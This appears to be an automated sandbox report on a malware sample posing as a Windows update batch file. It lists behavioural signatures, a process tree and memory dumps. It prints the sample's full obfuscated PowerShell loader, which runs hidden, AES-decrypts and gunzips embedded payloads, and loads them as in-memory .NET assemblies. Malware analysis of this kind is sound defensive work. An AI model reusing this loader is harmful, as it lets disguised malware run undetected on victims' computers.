SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/4140-50-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240319-en

Max time kernel

118s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2868-4-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2868-5-0x0000000002420000-0x0000000002428000-memory.dmp

memory/2868-6-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-7-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-8-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-9-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-11-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-10-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-12-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-13-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-14-0x00000000025F0000-0x0000000002670000-memory.dmp